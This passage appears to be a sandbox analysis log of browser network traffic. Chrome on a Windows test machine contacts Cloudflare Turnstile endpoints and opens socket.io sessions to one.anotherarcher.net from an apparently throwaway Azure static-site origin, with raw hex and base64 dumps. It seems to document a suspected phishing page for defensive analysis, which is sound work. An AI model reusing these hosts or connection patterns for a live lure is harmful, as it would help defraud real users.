                                                                                                                                                                                                                                Data Ascii: tJePtYi5tbJ9mK20xrSGpZmjlLmgv7q9pMSw1KXHk5mwtKnPztPYttnb5bDkutzV5Mql2sjLrMPQwL3F0a/r+LD79dHNyczfzgW/28DiAggLy9v1C8/c+RMEzvDT6xLSE/DaGPULGO75+yP4CAP26BMiJAgX6CwjHSIo5xEZ8QM3NC35MykbQDsWAgFDMClGNRsZGUYGTzosBlVPRyUVUFIyR1tfYDlLMi4xUjVpPUk4WzUsXEphRHREYGViNml
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC1369INData Raw: 35 33 52 32 5a 2b 34 78 4f 47 31 79 4f 50 52 79 64 62 74 31 2b 43 68 7a 37 7a 68 37 4d 57 72 72 75 62 57 7a 63 6a 37 2b 50 48 4b 75 50 58 41 76 2b 76 36 39 4f 50 2b 39 75 48 33 42 76 66 4e 2b 78 45 50 30 41 44 74 42 2b 59 47 45 42 54 32 31 67 54 70 47 67 67 59 32 78 76 67 2f 53 41 66 34 79 6a 65 48 43 59 69 48 50 55 4b 37 75 63 47 2f 65 34 74 43 44 55 67 42 66 63 54 43 52 51 2f 50 55 45 37 45 55 51 37 44 78 77 69 51 6a 38 61 42 51 59 6f 42 45 49 59 52 51 39 53 50 54 55 4f 55 55 49 68 57 6a 45 72 56 6c 39 4c 4b 7a 51 61 58 52 34 30 48 56 55 33 55 53 52 6d 56 55 45 6b 4c 54 41 77 5a 30 42 72 52 6c 46 55 63 31 42 56 63 46 4e 4c 58 48 45 37 56 54 31 41 51 7a 74 4f 63 34 4a 2b 65 59 68 57 56 59 31 34 62 6b 68 50 58 6b 35 54 6c 59 69 46 54 32 39 77 62 48 56 70
                                                                                                                                                                                                                                Data Ascii: 53R2Z+4xOG1yOPRydbt1+Chz7zh7MWrrubWzcj7+PHKuPXAv+v69OP+9uH3BvfN+xEP0ADtB+YGEBT21gTpGggY2xvg/SAf4yjeHCYiHPUK7ucG/e4tCDUgBfcTCRQ/PUE7EUQ7DxwiQj8aBQYoBEIYRQ9SPTUOUUIhWjErVl9LKzQaXR40HVU3USRmVUEkLTAwZ0BrRlFUc1BVcFNLXHE7VT1AQztOc4J+eYhWVY14bkhPXk5TlYiFT29wbHVp
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC1369INData Raw: 50 54 35 64 54 66 32 36 6a 57 76 61 58 4a 75 4f 32 73 72 73 48 6a 76 74 47 71 7a 72 69 34 73 76 6e 53 31 38 72 57 41 64 51 46 32 51 66 78 2f 4e 4c 63 41 77 33 4e 37 38 66 37 41 51 63 49 39 41 6e 55 44 41 7a 57 41 2b 63 52 48 66 4c 70 32 76 59 65 2f 68 41 45 49 79 6b 67 2f 41 6e 6d 48 53 77 6b 2f 51 30 64 41 66 50 30 49 54 50 33 4b 79 59 6d 2b 79 6f 7a 44 78 37 39 4f 69 77 73 51 6b 41 45 50 43 42 43 52 42 35 45 52 67 31 41 4d 6b 5a 4b 48 69 30 2b 46 46 4d 74 56 30 52 55 52 31 77 7a 59 53 30 59 48 53 52 6a 4f 6a 38 79 56 6a 63 2f 62 55 63 6c 57 44 31 6f 4c 6d 6f 78 61 57 4e 59 62 30 39 57 4d 32 68 4b 53 33 52 52 61 6a 6c 75 59 31 63 39 59 6f 4b 4a 53 45 52 5a 66 34 56 49 68 49 5a 68 66 32 31 67 55 6b 6d 52 53 31 52 75 55 6e 43 51 6a 6e 43 4c 6d 6e 46 69 63
                                                                                                                                                                                                                                Data Ascii: PT5dTf26jWvaXJuO2srsHjvtGqzri4svnS18rWAdQF2Qfx/NLcAw3N78f7AQcI9AnUDAzWA+cRHfLp2vYe/hAEIykg/AnmHSwk/Q0dAfP0ITP3KyYm+yozDx79OiwsQkAEPCBCRB5ERg1AMkZKHi0+FFMtV0RUR1wzYS0YHSRjOj8yVjc/bUclWD1oLmoxaWNYb09WM2hKS3RRajluY1c9YoKJSERZf4VIhIZhf21gUkmRS1RuUnCQjnCLmnFic
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC1369INData Raw: 71 71 37 36 33 71 71 6d 39 73 72 44 71 7a 75 48 31 39 74 4b 36 38 66 76 38 36 66 33 37 79 73 4c 35 2f 64 37 78 42 67 4d 4a 79 67 49 48 33 2b 55 4f 38 67 38 45 41 77 51 59 46 50 6b 56 37 39 50 7a 2b 2f 51 42 44 53 4d 50 2b 43 4c 36 45 79 62 2b 4b 75 6e 6c 34 2b 72 74 4a 53 67 79 43 68 4d 46 4b 54 59 54 45 6a 55 7a 47 67 6f 72 4c 6a 77 38 50 52 77 6a 50 44 49 5a 4b 44 34 69 43 7a 55 35 48 51 70 4b 54 77 6c 4a 54 6b 77 6e 4a 41 35 47 57 6a 70 46 57 6b 73 2b 56 55 35 43 48 32 4d 6c 57 31 41 2b 55 57 45 38 50 6d 67 75 61 46 35 41 61 56 41 7a 61 55 74 69 56 6b 6c 48 63 6d 68 72 64 7a 64 2f 58 56 39 62 57 30 4e 55 54 31 68 65 53 48 4e 2b 68 46 5a 4a 54 46 46 6c 55 57 4b 4d 68 4a 56 76 57 5a 4f 62 56 32 35 77 6e 49 2b 4d 66 57 4e 65 64 6f 5a 6d 6c 49 46 6d 71 71
                                                                                                                                                                                                                                Data Ascii: qq763qqm9srDqzuH19tK68fv86f37ysL5/d7xBgMJygIH3+UO8g8EAwQYFPkV79Pz+/QBDSMP+CL6Eyb+Kunl4+rtJSgyChMFKTYTEjUzGgorLjw8PRwjPDIZKD4iCzU5HQpKTwlJTkwnJA5GWjpFWks+VU5CH2MlW1A+UWE8PmguaF5AaVAzaUtiVklHcmhrdzd/XV9bW0NUT1heSHN+hFZJTFFlUWKMhJVvWZObV25wnI+MfWNedoZmlIFmqq
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC1369INData Raw: 76 65 76 50 33 75 2b 32 38 62 6a 4a 76 50 33 33 76 50 54 5a 41 2f 32 39 31 76 4c 77 75 76 30 4c 77 67 30 42 37 2b 37 50 45 41 63 42 30 67 6e 31 41 4d 72 35 36 2b 33 7a 46 42 58 52 47 50 67 62 4a 65 2f 77 47 42 6b 6b 39 42 63 56 35 75 6e 6b 44 2b 77 68 49 51 63 74 48 78 63 50 49 76 41 54 4c 54 49 56 51 44 6f 52 45 43 46 43 4d 67 34 56 51 7a 38 6d 43 41 6c 4b 4b 67 38 39 4f 69 56 4e 4a 51 34 54 43 51 34 34 4b 55 78 56 4b 55 5a 63 58 44 78 65 54 79 52 41 4a 47 67 6d 4d 54 31 43 48 6a 38 35 49 54 39 4b 4c 45 46 47 52 45 51 75 62 6c 55 33 62 58 64 49 58 7a 31 4a 56 33 6c 56 55 6d 46 38 63 48 4a 6c 66 59 46 49 57 57 68 66 55 49 36 50 5a 6c 46 4e 69 46 52 57 6c 34 35 6f 56 6e 52 56 57 6d 78 73 65 4a 35 62 67 6e 43 43 6e 71 4b 48 6e 49 68 72 71 49 4b 52 70 70 4a
                                                                                                                                                                                                                                Data Ascii: vevP3u+28bjJvP33vPTZA/291vLwuv0Lwg0B7+7PEAcB0gn1AMr56+3zFBXRGPgbJe/wGBkk9BcV5unkD+whIQctHxcPIvATLTIVQDoRECFCMg4VQz8mCAlKKg89OiVNJQ4TCQ44KUxVKUZcXDxeTyRAJGgmMT1CHj85IT9KLEFGREQublU3bXdIXz1JV3lVUmF8cHJlfYFIWWhfUI6PZlFNiFRWl45oVnRVWmxseJ5bgnCCnqKHnIhrqIKRppJ
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC1369INData Raw: 62 58 55 38 2f 48 62 31 4e 2f 38 36 74 44 77 33 2f 37 78 33 74 33 67 77 75 49 42 42 39 76 64 79 67 33 4e 42 77 62 6e 37 66 62 36 43 65 34 52 37 75 6e 71 49 4e 66 37 44 65 33 38 33 42 34 56 47 67 76 70 35 2b 73 74 41 79 58 76 42 44 51 6e 4a 68 59 72 4f 69 58 32 47 77 59 37 4e 7a 63 79 41 44 34 67 47 68 58 38 4e 77 49 65 47 68 78 4b 49 30 38 2b 42 79 68 44 52 79 45 74 53 41 6f 6d 53 53 59 73 46 7a 41 71 48 78 34 30 50 7a 77 58 50 53 45 66 4a 46 6c 46 62 44 6c 43 59 46 70 6e 53 58 52 71 62 45 39 43 4d 79 39 6e 56 58 68 4b 55 46 39 4d 64 6e 46 4f 56 48 70 64 55 59 4e 4a 57 34 42 57 57 6d 39 49 66 34 64 36 68 34 4e 4c 67 57 57 44 55 32 78 37 64 6d 65 4e 66 59 75 58 69 6e 47 62 6d 35 47 6e 6c 48 57 55 6d 36 5a 6f 67 49 6d 65 71 6f 6c 74 61 36 6d 68 63 4b 4f 76
                                                                                                                                                                                                                                Data Ascii: bXU8/Hb1N/86tDw3/7x3t3gwuIBB9vdyg3NBwbn7fb6Ce4R7unqINf7De383B4VGgvp5+stAyXvBDQnJhYrOiX2GwY7NzcyAD4gGhX8NwIeGhxKI08+ByhDRyEtSAomSSYsFzAqHx40PzwXPSEfJFlFbDlCYFpnSXRqbE9CMy9nVXhKUF9MdnFOVHpdUYNJW4BWWm9If4d6h4NLgWWDU2x7dmeNfYuXinGbm5GnlHWUm6ZogImeqolta6mhcKOv
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC1369INData Raw: 6e 73 30 4f 37 2b 38 4e 58 6b 2f 50 4c 59 39 67 58 37 37 41 38 48 2b 76 48 77 79 2f 59 4c 7a 38 38 46 36 42 54 6c 42 74 63 54 46 77 6f 58 44 78 30 4f 39 41 6b 67 46 51 76 34 4a 68 6b 4e 45 53 77 54 4a 78 38 74 48 75 38 7a 4d 79 67 5a 4d 7a 49 6d 39 7a 4d 35 4c 53 46 44 51 44 45 6c 41 52 49 79 50 30 74 49 4e 68 34 70 43 54 6f 78 44 45 39 45 4e 55 4e 55 4f 30 39 58 56 6b 59 74 57 31 56 4e 51 7a 46 66 54 6b 56 6a 58 6c 56 4b 53 57 64 5a 50 6b 31 6c 59 46 46 7a 4c 46 34 77 5a 33 52 62 63 46 6c 31 61 56 35 65 53 6d 6f 38 67 33 70 75 51 45 42 39 64 57 6d 48 69 47 39 4b 58 59 70 7a 54 4a 4f 4d 67 58 5a 31 55 59 4e 70 56 4a 57 4d 66 5a 65 61 69 6f 4b 42 6e 6f 35 67 6f 35 2b 56 69 57 56 32 6c 71 53 4e 71 5a 71 42 71 32 79 66 6c 61 75 30 6f 34 75 4a 74 4b 65 64 75
                                                                                                                                                                                                                                Data Ascii: ns0O7+8NXk/PLY9gX77A8H+vHwy/YLz88F6BTlBtcTFwoXDx0O9AkgFQv4JhkNESwTJx8tHu8zMygZMzIm9zM5LSFDQDElARIyP0tINh4pCToxDE9ENUNUO09XVkYtW1VNQzFfTkVjXlVKSWdZPk1lYFFzLF4wZ3RbcFl1aV5eSmo8g3puQEB9dWmHiG9KXYpzTJOMgXZ1UYNpVJWMfZeaioKBno5go5+ViWV2lqSNqZqBq2yflau0o4uJtKedu


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                138192.168.2.449899104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2039740840:1727987324:6iAWAvvaUE-RR1f5VjEdMpMjA0FAo4zmykNisH4-Eow/8ccfd86f5fc70ca2/54bb74df38cddf8 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:43 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                cf-chl-out: N3YEs+SH9BNExYVIJWGG+NY6cMYNCsGo8Lw=$uWFh68+GikVBENdS
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd89f2d89c344-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                139192.168.2.449898104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccfd86f5fc70ca2/1727989059466/V1GlFmnFZc-pbXa HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/n0t9y/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:43 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd89f29914379-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 46 00 00 00 59 08 02 00 00 00 0c cc c5 9d 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDRFYIDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                140192.168.2.449900104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccfd84d0859428f/1727989054308/PhU9i5DT5iFvgSb HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:43 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd89f69d47d0e-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5c 00 00 00 63 08 02 00 00 00 99 a1 f0 77 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDR\cwIDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                141192.168.2.44990379.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC586OUTGET /socket.io/?EIO=4&transport=websocket&sid=QVT9suDRefEWf0f5AANg HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Sec-WebSocket-Key: 75devDfZ+tWo11aqSQGBKQ==
                                                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:43 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                142192.168.2.44990279.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC728OUTPOST /socket.io/?EIO=4&transport=polling&t=P9KB9aE&sid=QVT9suDRefEWf0f5AANg HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC2OUTData Raw: 34 30
                                                                                                                                                                                                                                Data Ascii: 40
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC207INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:43 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC2INData Raw: 6f 6b
                                                                                                                                                                                                                                Data Ascii: ok


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                143192.168.2.44990479.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC389OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB98u HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:43 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 51 4b 76 38 55 47 6f 50 73 4c 36 55 6b 4b 31 63 41 41 4e 69 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"QKv8UGoPsL6UkK1cAANi","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                144192.168.2.44990179.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB9aG&sid=QVT9suDRefEWf0f5AANg HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:43 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 32
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 61 51 47 2d 74 4d 4d 48 37 66 67 64 41 7a 2d 59 41 41 4e 68 22 7d
                                                                                                                                                                                                                                Data Ascii: 40{"sid":"aQG-tMMH7fgdAz-YAANh"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                145192.168.2.449905104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/520840529:1727987471:dZM8UV-JAT2hGcuf3zG_cR0GPG48srOyHscTUzuMey8/8ccfd84d0859428f/2b545705cb2f7d9 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:44 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                cf-chl-out: dPobCRIbo+e9TKXSVrxM0RcnmTsy10s5MBw=$q+Za6X77VuBRKrOq
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd8a3cce9c402-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                146192.168.2.449906104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC843OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/c48er/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
